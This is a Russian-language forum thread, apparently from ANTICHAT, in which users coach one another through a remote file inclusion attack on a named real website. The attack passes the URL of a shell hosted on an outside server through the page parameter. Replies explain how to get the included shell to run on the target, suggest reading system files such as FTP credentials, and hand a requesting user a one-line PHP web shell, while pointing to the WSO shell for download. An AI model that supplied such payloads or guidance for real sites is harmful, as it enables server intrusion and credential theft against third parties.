ANTICHAT — форум по информационной безопасности, OSINT и технологиям

А что делать если стоит фильтрация на \ : . - вообщем на "плохие" символы?

Такая фигня, http://www.prodisney.ru/index.php?page=http://nabstre.tu2.ru/shell.php но показывает дерикторию моего сайта а не этого что делать???

Во первых скрипт на твоем сайте должен быть не исполняемым, то есть txt файл к примеру.
Либо вообще без расширения, то есть так:

index.php?page=http://nabstre.tu2.ru/shell.txt?

Потому что если файл исполняемый, то он исполнятся будет на твоем сервере, а на выходе будет уже результат. Поэтому выводится содержание директории на твоем сервере.


Во вторых конкретно на этом сайте бага не работает, скрипт не инклюдит файлы, а выводит их содержание.
Так что облом.

а такой вопросик почему часто бывает то что шел не запускается а просто отображается код шелла.

потому что риадер, а не LFI, нет инклуда, есть читалка

PS: Но тоже очень неплохо, т.к. можно прочитать важную системную информацию, например фтп-логин/пасс, что будет покруче любого шелла

Бага в функциях fopen(), file(), file_get_contents() и подобных функциях, которые не способны интерпретировать код.

а можете дать адрес рабочего шелла? а то та, которая в статье - уже дохлый.
(или код, чтоб запись на свой хост)

<?php system($_GET[cmd]); ?>

Если нужен продвинутый шелл - топай топай в раздел "Избраное" и качай WSO

Спасибо, нашел и скачал.
а не подскажете как его настроить? просто все это залить в сервер и "вызывать" по адресу: www.mysite.ru/wso2.php ?